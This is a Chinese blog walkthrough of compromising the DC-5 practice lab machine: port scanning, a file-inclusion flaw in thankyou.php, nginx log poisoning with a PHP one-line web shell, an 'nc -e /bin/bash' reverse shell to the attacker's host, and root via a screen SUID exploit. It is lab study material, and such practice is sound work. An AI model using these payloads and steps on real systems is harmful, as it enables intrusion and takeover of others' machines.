渗透测试学习之靶机DC-5

过程
1. 探测目标主机

nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.142
在这里插入图片描述

2. 信息搜集
  • 端口信息
    nmap -sV -p 1-65535 192.168.246.142
    在这里插入图片描述
  • web站点相关服务信息
    在这里插入图片描述
  • 目录信息
    在这里插入图片描述
    看到footer.php,这个页面在前面点站点功能的时候没有看到…
    在这里插入图片描述在这里插入图片描述
    这是每个页面末尾的标注,并且每访问一次都会随机变换,发现其他页面刷新并不会变换,但是thankyou.php也会随机变换。
    在这里插入图片描述在这里插入图片描述
    应该是thankyou.php调用了footer.php,即thankyou.php可能包含了footer.php。
3. 文件包含getshell
  • 测试
    抓包后,url后增加?file=/etc/passwd,放,查看响应包:
    在这里插入图片描述
    到这发现文件包含了,参考大佬文章如何进行下一步操作知道:GET请求目标后会在日志文件中记录,可以将一句话写在请求的URL后,下图角标处(即替换/phpinfo.php),这样访问日志文件可以将一句话读取出来:
    (图中是使用phpstudy中查看nginx的配置文件信息)
    在这里插入图片描述
  • 写入一句话
    <?php system($_GET['cmd']); ?>
    在这里插入图片描述
    access.log文件较大,在var/log/nginx/error.log下没有发现错误请求信息,说明已经写入了access.log。
    在这里插入图片描述
  • 反弹shell
    在kali上监听8888端口,然后访问此url:
    http://192.168.246.142/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.246.138 8888
    在这里插入图片描述
    获取交互式shell:
    python -c 'import pty;pty.spawn("/bin/bash")'
    在这里插入图片描述
4.提权

查找符合条件的文件:
find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
使用searchsploit查找响应漏洞:
searchsploit screen
在这里插入图片描述
cat /usr/share/exploitdb/exploits/linux/local/41154.sh
在这里插入图片描述
按照教程走就行:
在这里插入图片描述
得到了两个文件libhax.so和rootshell后,把它们上传到靶机里。
使用scp命令获取kali里的这两个文件,前提需要配置开启kali的ssh服务:
scp root@192.168.246.138:/tmp/libhax.so /tmp/
scp root@192.168.246.138:/tmp/rootshell /tmp/
在这里插入图片描述
成功上传到靶机里:
在这里插入图片描述
继续按照41154.sh的教程就行:
在这里插入图片描述
进入root目录,得到thisistheflag.txt:
在这里插入图片描述

总结
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值